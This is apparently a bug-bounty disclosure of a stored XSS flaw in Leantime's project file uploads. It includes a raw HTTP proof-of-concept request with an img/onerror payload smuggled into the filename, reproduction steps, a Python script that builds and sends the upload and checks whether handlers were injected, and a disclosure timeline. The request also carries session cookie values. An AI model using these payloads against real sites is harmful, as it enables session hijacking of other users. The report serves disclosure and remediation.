Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on

Nov 1st 2021


Description

Stored XSS via the filename of an uploaded file: the name is saved as supplied and later rendered into the project page without output encoding.

Proof of Concept

// PoC.req
POST /leantime/public//projects/showProject/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4148739525669256752671116272
Content-Length: 71553
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public//projects/showProject/3
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6IlJtckQrZ0FsM0ZDaFppZWNhZHhUNEE9PSIsInZhbHVlIjoiMm52ODQwMmlnTDBaU2RQelRoMWk3elBZdVlERS9UUVdOL2NBb24yVzJlTEl4cTNWejdkYUt0R1NPWlRIZDJrQk40dVdQM3BwbDRNenhmRWRGdWRPV1VuK2l6b251Tm1UVTJKR2cxcHJYV3d3ZmpuMHYvQU1CZ1BQNGtyWkJnRVMiLCJtYWMiOiJhZTlmOGVlYTNjODYxYjQ2ZmM1YjNlMWVhNTg4MzJhYTU1YmM2NzJhNjIwZjlhYjgxZTU1NmNmMDhiOGNmZGM3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9qYWZQcVpJZTF2QklNSjVMeHpFaXc9PSIsInZhbHVlIjoicTRxSndoNDdpRjBuYWxFVklaeFoxbEMvOFI2NW0zWExJcE81cDVBK1pkY3dXZEhNY1hXLzN5R0djelJURzA0bElWeC9zN1drQUlUUWZJaHN6eDNER1FDa3ZXdGZmSkJpWDNrN2lMMzV6Z2o2MmpMUGFpV0w3R01YM1FlbWVHeHgiLCJtYWMiOiJmYjFjNGE1YzM1ZDUwOWNiYWM2ZDQwYzVhMDMzY2IxZDRjNDk4NGNhODA2ZDRmZDZiMGJmMDlhMDMxYjM1YjFiIiwidGFnIjoiIn0%3D; sid=cecedc4236bbfb8d968f5370f8a42324fbb3ea99-89b8102536c949c0f917e83121e7b36ff776c8ef
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

[binary JPEG body (JFIF header with embedded Photoshop 8BIM metadata), omitted]

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="upload"

Upload
-----------------------------4148739525669256752671116272--

Steps to Reproduce

Create a file with a name like: test'><img src=x onerror=alert(1)>xss.jpg

Go to Project Settings, choose a project, and under Files select that file and upload it.

The XSS fires once the upload succeeds and the project page is re-rendered with the stored filename.
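As an added example (not part of the report or of Leantime's code), the following Python script reproduces the steps above programmatically and checks the outcome. It builds the same multipart body as the PoC request with the malicious filename, can send it with a session cookie, and then parses the returned HTML for any element carrying an on* event-handler attribute, which is how you tell an injected tag from a harmlessly escaped one. `render_vulnerable` and `render_fixed` are hypothetical stand-ins for the template line, not Leantime's code; the `/files/` path, the boundary string and the minimal JPEG bytes are constructed for the example.

```python
import html
import urllib.request
from html.parser import HTMLParser

# Constructed payload, as in the report: the leading quote and '>' close a
# single-quoted attribute and the remainder injects a new element.
PAYLOAD_FILENAME = "test'><img src=x onerror=alert(1)>xss.jpg"

# Constructed minimal JPEG (SOI, APP0/JFIF segment, EOI) so MIME sniffing
# still classifies the upload as an image.
MINIMAL_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
                b"\xff\xd9")


def build_multipart(filename, content, boundary, field="file", content_type="image/jpeg"):
    """Build the multipart/form-data body the PoC request sends: one file part
    plus the 'upload' submit button. The filename is copied verbatim into the
    Content-Disposition header, as a browser does. (A filename containing a
    double quote would need escaping; the report's payload uses only single quotes.)"""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    tail = (f"\r\n--{boundary}\r\n"
            'Content-Disposition: form-data; name="upload"\r\n\r\n'
            "Upload\r\n"
            f"--{boundary}--\r\n").encode()
    return head + content + tail


def send_upload(url, cookie, filename=PAYLOAD_FILENAME, boundary="----pocboundary1234"):
    """Live reproduction (hypothetical helper, not exercised offline): POST the
    upload with the tester's own session cookie and return the response HTML."""
    body = build_multipart(filename, MINIMAL_JPEG, boundary)
    req = urllib.request.Request(url, data=body, method="POST", headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Cookie": cookie,
    })
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", "replace")


def render_vulnerable(filename):
    """Hypothetical file-list row as the report implies the template behaved:
    the stored filename is echoed raw inside a single-quoted attribute and as text."""
    return f"<a href='/files/{filename}'>{filename}</a>"


def render_fixed(filename):
    """Same row with output encoding. quote=True escapes both quote characters,
    so the payload can no longer close the attribute it lands in."""
    safe = html.escape(filename, quote=True)
    return f"<a href='/files/{safe}'>{safe}</a>"


class HandlerFinder(HTMLParser):
    """Collects start tags that carry an on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.hits.append((tag, name, value))


def find_injected_handlers(page_html):
    """Return (tag, attribute, value) for every element with an on* handler;
    an empty list means nothing executable was injected into the markup."""
    parser = HandlerFinder()
    parser.feed(page_html)
    parser.close()
    return parser.hits


if __name__ == "__main__":
    print("vulnerable:", find_injected_handlers(render_vulnerable(PAYLOAD_FILENAME)))
    print("fixed:     ", find_injected_handlers(render_fixed(PAYLOAD_FILENAME)))
```

Run the script directly to compare the two renderings; `send_upload` is for a live target with a test account's cookie, and its response can be fed straight into `find_injected_handlers`. The fixed rendering depends on `html.escape(..., quote=True)`: the single quote has to be encoded because the payload opens with `'>` to break out of a single-quoted attribute. In PHP, the project's language, `htmlspecialchars()` only encodes single quotes when called with `ENT_QUOTES`; before PHP 8.1 the default was `ENT_COMPAT`, which leaves `'` untouched, so an encoding fix that relies on the default flags on an older PHP would still let a payload like this one close a single-quoted attribute.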

Impact

Because the payload is stored in the filename, it executes in the browser of any user who views the affected project page. An attacker can use it to steal that user's session cookie and gain unauthorized access to their account.

We have contacted a member of the leantime team and are waiting to hear back a month ago
We have sent a follow up to the leantime team. We will try again in 7 days. a month ago
We have sent a second follow up to the leantime team. We will try again in 10 days. a month ago
lethanhphuc submitted a
22 days ago
Marcel Folaron validated this vulnerability 21 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Marcel Folaron confirmed that a fix has been merged on 9552c5 21 days ago
lethanhphuc has been awarded the fix bounty
showProject.tpl.php#L104 has been validated